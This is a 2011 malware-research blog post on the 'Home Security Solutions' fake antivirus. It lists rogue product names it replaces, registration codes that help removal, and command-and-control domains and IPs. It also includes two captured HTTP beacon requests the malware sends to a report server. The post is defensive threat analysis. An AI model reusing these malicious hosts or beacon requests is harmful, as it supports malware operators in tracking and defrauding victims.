Sunday, 25 December 2011

Home Security Solutions

 Not yet my last post for this year finally... wild fakeAV appeared !



Home Security Solutions is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Home Safety Essentials, Anti-Malware Lab, System Smart Security, PC Security Guardian, Best Malware Protection, Internet Security Essentials, Smart Internet Protection 2011, Personal Internet Security 2011, Personal Security Sentinel, Internet Antivirus 2011, Internet Security Suite, Smart Security, My Security Shield, Security Master AV, My Security Engine, Security Guard, CleanUp Antivirus and Security Antivirus



Loader:

Payload:

To register (and help removal), use one of these codes: K7LY-R5GU-SI9D-EVFB
K7LY-H4KA-SI9D-U2FD
U2FD-S2LA-H4KA-UEPB

Click on the Help icon, Register Now.
Enter the Serial code and click on Activate Product Key.


---

• dns: 1 ›› ip: 76.73.19.180 - adresse: WWW5.THEBEST-AV-FORYOU.COM

• dns: 1 ›› ip: 76.73.19.178 - adresse: SECURE1.SMARTWASUITE.COM

• dns: 1 ›› ip: 76.73.19.180 - adresse: SECURE1.THEBEST-ARMYFYA.COM

The following url was found:
• dns: 1 ›› ip: 76.73.19.180 - adresse: WWW5.THEBEST-AV-FORYOU.COM
• dns: 1 ›› ip: 76.73.19.178 - adresse: SECURE1.SMARTWASUITE.COM
• dns: 0 ›› ip: - adresse: SECURE2BESTIQI-GUARD.COM
• dns: 1 ›› ip: 76.73.19.180 - adresse: SECURE1.THEBEST-ARMYFYA.COM
• dns: 0 ›› ip: - adresse: REPORT2.OGPERTQEYTAGAHERT.COM

GET /?unbpahwn=kuTK4N7k6G%2BB3s3kuNfm587c2bPM0dfX5pqkyOHW4%2BKfp5GYnePbya2mmOuoa%2BbdyLWY5tbV6ObV%0D%0ApJGflamkXpShnaiekqCRmJ3P1MfirLrHhVTf0NSipZrezt2xkYs%3D HTTP/1.1
Host: report2.ogpertqeytagahert.com

GET /?gbifvbt=mOTK4N7k6G%2BP0tvZ29Po1ovu3cWkmI7c6LGl2ce9jc7SydvQ59eiu6a%2BzV%2BApK7FksW9qqmmubet%0D%0Ao47S29hrmKPRm5mhl6mb2qvGqaaoqJSP1MjUmdjW153frJXJxZ%2BLxb1yoKCemJOZjLiruK%2FHz8Tg%0D%0A36Cd5tWW0eWxoova1sPZnrC4xZqEyOG21damnaaSmtTO3NuvpFY%3D HTTP/1.1
Host: report2.ogpertqeytagahert.com

Thanks to Remixed for the sample.

PS: All your BH are belong to us.

btw, check your mail dude

No comments:

Post a comment